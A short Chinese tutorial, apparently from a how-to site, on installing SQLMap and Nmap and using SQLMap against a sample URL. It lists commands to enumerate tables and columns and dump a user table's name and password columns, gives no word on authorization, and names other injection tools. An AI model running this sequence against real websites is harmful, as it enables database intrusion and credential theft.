文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
SQLMap是一个功能很强大的渗透测试工具,而且源码开放,支持的数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite等等。文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
第一步、安装 Python 环境:yum install python -y文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
第二步、SQLMap 的安装比较简单,把源码下载下来就可以了,安装到指定目录为/usr/local/ ,下载命令:文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
git clone https://github.com/sqlmapproject/sqlmap.git
第三步、安装 Nmap ,下载编译安装文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
git clone https://github.com/nmap/nmap.git cd nmap ./configure make && make install make clean
简单演示一下关于sqlmap下注入:文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
注入漏洞地址:http://www.example.com/showannounce.asp?id=104文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" 【Kali下使用:sqlmap -u "http://jgkd.xxx.com/announceshow.asp?id=203"】文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --tables文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --columns -T user文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --dump -T user -C "name,psw"文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
中间会提示让你输入线程,输入大概5到10个线程这个样子。上面的user,psw这些视情况而定,灵活应用。文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html
还有如果不熟悉Kali或没有Linux环境的,用啊D,明小子、穿山甲等工具去跑也可以,前提是你字典足够强大!文章源自菜鸟学院-https://www.cainiaoxueyuan.com/yunwei/17324.html